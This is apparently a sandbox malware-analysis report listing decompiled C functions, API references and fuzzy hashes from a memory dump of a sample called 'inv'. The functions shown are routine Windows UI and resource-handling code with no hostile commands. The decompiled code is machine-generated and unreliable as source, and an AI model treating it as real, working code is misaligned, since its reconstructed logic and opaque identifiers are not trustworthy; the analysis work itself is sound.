                                  0x00000000
                                  0x00000000
                                  0x0040e419
                                  0x0040e419
                                  0x0040e420
                                  0x0040e42b
                                  0x0040e433
                                  0x0040e43a
                                  0x0040e441
                                  0x0040e442
                                  0x0040e447
                                  0x0040e452
                                  0x0040e452
                                  0x0040e460
                                  0x0040e464
                                  0x0040e46a
                                  0x0040e46b
                                  0x0040e47b

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E3AF
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E3CB
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E442
                                  • VariantClear.OLEAUT32(?), ref: 0040E46B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction ID: 54b597303299e2a6500ee443c65802fa474a5cc75a31fadfedc6e615001296d4
                                  • Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
                                  • Instruction Fuzzy Hash: 8A413175A002198FCB61DB5ACC90BC9B3BCAF48304F0045EAE548F7392D638AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BF00, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040BF00() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x44f740 = 0x409;
				 *0x44f744 = 9;
				 *0x44f748 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x44f740 = _t14;
				}
				if(_t14 != 0) {
					 *0x44f744 = _t14 & 0x3ff;
					 *0x44f748 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x44d10c, 0x40c054, 8 << 2);
				if( *0x44d0c4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x44f74d = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x44f74c = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040BE88(__eflags, _t49);
					}
				} else {
					_t20 = E0040BEE8();
					if(_t20 != 0) {
						 *0x44f74d = 0;
						 *0x44f74c = 0;
						return _t20;
					}
					E0040BE88(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C18(0x44d10c, 0x20, 0x40c054);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x44f74c = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x44f74d = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x44f740; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x44f74d = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                  0x0040bf0c
                                  0x0040bf16
                                  0x0040bf20
                                  0x0040bf2a
                                  0x0040bf31
                                  0x0040bf33
                                  0x0040bf33
                                  0x0040bf3b
                                  0x0040bf47
                                  0x0040bf53
                                  0x0040bf53
                                  0x0040bf67
                                  0x0040bf70
                                  0x0040c01f
                                  0x0040c024
                                  0x0040c029
                                  0x0040c030
                                  0x0040c035
                                  0x0040c037
                                  0x0040c03a
                                  0x0040c040
                                  0x0040c042
                                  0x00000000
                                  0x0040c04a
                                  0x0040bf76
                                  0x0040bf76
                                  0x0040bf7d
                                  0x0040bf7f
                                  0x0040bf86
                                  0x00000000
                                  0x0040bf86
                                  0x0040bf93
                                  0x0040bfa3
                                  0x0040bfa5
                                  0x0040bfaa
                                  0x0040bfad
                                  0x0040bfb3
                                  0x0040bfb5
                                  0x0040bfb7
                                  0x00000000
                                  0x0040bfb7
                                  0x0040bfc3
                                  0x0040bfc8
                                  0x0040bfce
                                  0x0040bfce
                                  0x0040bfd0
                                  0x0040bfd1
                                  0x0040bfd2
                                  0x0040bfd2
                                  0x0040bfee
                                  0x0040bff4
                                  0x0040bff9
                                  0x0040bffe
                                  0x0040c004
                                  0x0040c004
                                  0x0040c008
                                  0x0040c00b
                                  0x0040c011
                                  0x0040c013
                                  0x00000000
                                  0x00000000
                                  0x0040c015
                                  0x0040c018
                                  0x0040c018
                                  0x0040c019
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040c019
                                  0x0040c004
                                  0x0040c051
                                  0x0040c051
                                  0x00000000

                                  APIs
                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040BFF4
                                  • GetThreadLocale.KERNEL32 ref: 0040BF2A
                                    • Part of subcall function 0040BE88: GetCPInfo.KERNEL32(00000000,?), ref: 0040BEA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: InfoLocaleStringThreadType
                                  • String ID:
                                  • API String ID: 1505017576-0
                                  • Opcode ID: 3b9f9a4303a890bf50e3beaf642cfd9b5bc2a9f3e3cd36154dc9aa29540c40fd
                                  • Instruction ID: 673c4af7e4609a9bf5262c4f47039311d62ae4a8027dd5f7c1ed1ec743a0ee3b
                                  • Opcode Fuzzy Hash: 3b9f9a4303a890bf50e3beaf642cfd9b5bc2a9f3e3cd36154dc9aa29540c40fd
                                  • Instruction Fuzzy Hash: 00316775500345CBE720D765AC423A73B94EB53308F84817BE988AB3C2D73C4849CBAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E8BC, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0041E8BC(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041CAE4(_v8);
					_push(_t84);
					_push(0x41e99b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0041FBD8( *((intOrPtr*)(_v8 + 0x58)));
					E0041E738( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0041FCD8( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00405FC8();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L004060F0();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L004060C8();
					}
					E0041CDD8(_v8, _t66);
					_t58 =  *0x44d6d0; // 0x2190acc
					E00413808(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x41e9a2);
					return E0041CC50(_v8);
				}
			}



















                                  0x0041e8bd
                                  0x0041e8bf
                                  0x0041e8c2
                                  0x0041e8c5
                                  0x0041e8cc
                                  0x0041e9a6
                                  0x0041e8d2
                                  0x0041e8d5
                                  0x0041e8dc
                                  0x0041e8dd
                                  0x0041e8e2
                                  0x0041e8e5
                                  0x0041e8ee
                                  0x0041e8ff
                                  0x0041e90a
                                  0x0041e90f
                                  0x0041e911
                                  0x0041e916
                                  0x0041e921
                                  0x0041e926
                                  0x0041e93c
                                  0x0041e928
                                  0x0041e932
                                  0x0041e932
                                  0x0041e945
                                  0x0041e948
                                  0x0041e94d
                                  0x0041e96b
                                  0x0041e94f
                                  0x0041e94f
                                  0x0041e951
                                  0x0041e952
                                  0x0041e953
                                  0x0041e95b
                                  0x0041e95e
                                  0x0041e95f
                                  0x0041e95f
                                  0x0041e973
                                  0x0041e97b
                                  0x0041e980
                                  0x0041e987
                                  0x0041e98a
                                  0x0041e98d
                                  0x0041e99a
                                  0x0041e99a

                                  APIs
                                    • Part of subcall function 0041CAE4: RtlEnterCriticalSection.KERNEL32(0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CAEC
                                    • Part of subcall function 0041CAE4: RtlLeaveCriticalSection.KERNEL32(0044F8C0,0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CAF9
                                    • Part of subcall function 0041CAE4: RtlEnterCriticalSection.KERNEL32(00000038,0044F8C0,0044F8C0,00000000,0041B592,00000000,0041B5F1), ref: 0041CB02
                                    • Part of subcall function 0041FCD8: 72E7AC50.USER32(00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD2E
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD43
                                    • Part of subcall function 0041FCD8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD4D
                                    • Part of subcall function 0041FCD8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD71
                                    • Part of subcall function 0041FCD8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041FD7C
                                  • 72E7A590.GDI32(00000000,00000000,0041E99B), ref: 0041E911
                                  • SelectObject.GDI32(00000000,?), ref: 0041E92A
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,0041E99B), ref: 0041E953
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,0041E99B), ref: 0041E95F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  • Opcode ID: feacf5ce7700d04aae2a41c11bb7db96fab8d571773fe63d889105a96b4d4276
                                  • Instruction ID: 07020bdef8cfd6c706ef5012b8467a4433cf6636d4d93da829686172033ef888
                                  • Opcode Fuzzy Hash: feacf5ce7700d04aae2a41c11bb7db96fab8d571773fe63d889105a96b4d4276
                                  • Instruction Fuzzy Hash: 07313A74A10614EFD704EF5AC981D9EB7F5FF48710B6241A6F804AB362C638EE80DB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043F4CC, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043F4CC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0043EBD8(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0043EA54(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0043EA54(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E004081E4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408128(_a12, _t49);
				}
			}










                                  0x0043f4d3
                                  0x0043f4d5
                                  0x0043f4d7
                                  0x0043f4e2
                                  0x00000000
                                  0x0043f566
                                  0x0043f4e6
                                  0x0043f4f6
                                  0x0043f513
                                  0x0043f518
                                  0x0043f51d
                                  0x0043f52a
                                  0x0043f52a
                                  0x0043f4f8
                                  0x0043f4ff
                                  0x0043f50c
                                  0x0043f50c
                                  0x0043f531
                                  0x00000000
                                  0x0043f533
                                  0x0043f536
                                  0x0043f545
                                  0x00000000
                                  0x0043f54d

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 3440200573201bab2bebd85e4a1de614fb6aeba4493523cd0daf432fd3fb3d7d
                                  • Instruction ID: 1e3a7c6c1140f1a20012f1ddd368b7abd3c0f15e243b554b66ef254291610b19
                                  • Opcode Fuzzy Hash: 3440200573201bab2bebd85e4a1de614fb6aeba4493523cd0daf432fd3fb3d7d
                                  • Instruction Fuzzy Hash: 96116D31601214BFCB00EE6E8C819AF77E8AF49354F10557AF81AD7382D638ED0697A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A010, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0041A010(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x44f664; // 0x400000
				 *0x44d400 = _t6;
				_t8 =  *0x44d414; // 0x41a000
				_t9 =  *0x44f664; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L004061D0 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x44f664; // 0x400000
						_t20 =  *0x44d414; // 0x41a000
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x44d3f0);
				}
				_t13 =  *0x44f664; // 0x400000
				_t24 =  *0x44d414; // 0x41a000
				_t22 = E004066D0(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00419F54(_a4, _a8));
				}
				return _t22;
			}














                                  0x0041a017
                                  0x0041a01c
                                  0x0041a025
                                  0x0041a02b
                                  0x0041a031
                                  0x0041a039
                                  0x0041a03b
                                  0x0041a03e
                                  0x0041a04c
                                  0x0041a04e
                                  0x0041a054
                                  0x0041a05a
                                  0x0041a05a
                                  0x0041a064
                                  0x0041a064
                                  0x0041a07a
                                  0x0041a087
                                  0x0041a097
                                  0x0041a09e
                                  0x0041a0af
                                  0x0041a0af
                                  0x0041a0ba

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  • Opcode ID: 9c4bbc2fe38408a5eaafd95ea2f73c67dbbec0456e05d0916319167816d8b42a
                                  • Instruction ID: 9476dbb011fff8fc93c159ac99fa5e3487baa8428013c6211b4c10347a8954ef
                                  • Opcode Fuzzy Hash: 9c4bbc2fe38408a5eaafd95ea2f73c67dbbec0456e05d0916319167816d8b42a
                                  • Instruction Fuzzy Hash: D60161756002046BDB10EF58DD41F9B379CE71E308F118136F905E72E2D63AA865876D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A198, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044A198(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x44fbb0; // 0x2191714
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E0044A128, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00413524( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                  0x0044a19a
                                  0x0044a19d
                                  0x0044a19f
                                  0x0044a1a8
                                  0x0044a1b5
                                  0x0044a1be
                                  0x0044a1c1
                                  0x0044a1cd
                                  0x0044a1d2
                                  0x0044a1d2
                                  0x0044a1dc
                                  0x0044a1ea
                                  0x0044a1ec
                                  0x0044a1f9
                                  0x0044a1fb
                                  0x0044a1fb
                                  0x0044a202
                                  0x0044a202
                                  0x0044a20b
                                  0x0044a20f
                                  0x0044a211
                                  0x0044a225
                                  0x0044a231
                                  0x0044a236
                                  0x0044a237
                                  0x0044a211
                                  0x0044a20f
                                  0x0044a1dc
                                  0x0044a23c
                                  0x0044a23c
                                  0x0044a246

                                  APIs
                                  • EnumWindows.USER32(0044A128), ref: 0044A1CD
                                  • GetWindow.USER32(00000003,00000003), ref: 0044A1E5
                                  • GetWindowLongA.USER32 ref: 0044A1F2
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 0044A231
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  • Opcode ID: 9ba56b138c43f3330658c4909dbe6c961510740f521309e3fff4f8773774de22
                                  • Instruction ID: f8b785adff53e95d43a099e4fbb83e193ae907c96eecd01430068fe6292470f9
                                  • Opcode Fuzzy Hash: 9ba56b138c43f3330658c4909dbe6c961510740f521309e3fff4f8773774de22
                                  • Instruction Fuzzy Hash: 9B119E31644200AFE710AA28CC85F9673D8FB05724F1501BAFA58AF3D2C3B99C50C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415ABC, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00415ABC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00415A4C(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x415b60
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00415A4C(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x415b60
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x415824
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E004157E4(_t23, _t25, _t18);
			}

















                                  0x00415ac3
                                  0x00415ac6
                                  0x00415ac8
                                  0x00415ad8
                                  0x00415ada
                                  0x00415add
                                  0x00415adf
                                  0x00415ae2
                                  0x00415ae7
                                  0x00415ae7
                                  0x00415ae8
                                  0x00415af2
                                  0x00415af4
                                  0x00415af7
                                  0x00415af9
                                  0x00415afc
                                  0x00415b01
                                  0x00415b02
                                  0x00415b0c
                                  0x00415b0d
                                  0x00415b11
                                  0x00415b1a
                                  0x00415b25

                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 00415AD3
                                  • LoadResource.KERNEL32(?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415AED
                                  • SizeofResource.KERNEL32(?,00415B60,?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415B07
                                  • LockResource.KERNEL32(00415824,00000000,?,00415B60,?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415B11
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: 40cefda4bedf5af985eb158a3cb3244e4f8f17a081b66abc97ca9adf42e7264c
                                  • Instruction ID: d00c21edfdc939c2d74af0d4e664c14173a6499455d2034f4537efafd8add27a
                                  • Opcode Fuzzy Hash: 40cefda4bedf5af985eb158a3cb3244e4f8f17a081b66abc97ca9adf42e7264c
                                  • Instruction Fuzzy Hash: D4F01DB2645A04AF9744EE9DE881D9B77ECEE883A4314016FF908D7246DA38DD418778
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00429C54, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E00429C54(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x44fb20; // 0x2191290
					if(GlobalFindAtomA(E004042D0(_t9)) !=  *0x44fb1c) {
						_t16 = 0 | E00428D9C(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x44fb1c & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                  0x00429c54
                                  0x00429c56
                                  0x00429c57
                                  0x00429c59
                                  0x00429c5d
                                  0x00429c74
                                  0x00429c8b
                                  0x00429cab
                                  0x00429c8d
                                  0x00429c9d
                                  0x00429c9d
                                  0x00429c8b
                                  0x00429cb3

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00429C61
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00429CCC,00429A8E,0044FB54,00000000,0042987E,?,-0000000C,?), ref: 00429C6A
                                  • GlobalFindAtomA.KERNEL32 ref: 00429C7F
                                  • GetPropA.USER32 ref: 00429C96
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: 14e42b677e946c6b40f206c3b5b14c2a92358c2c0235b84ea2fa26aaedab912f
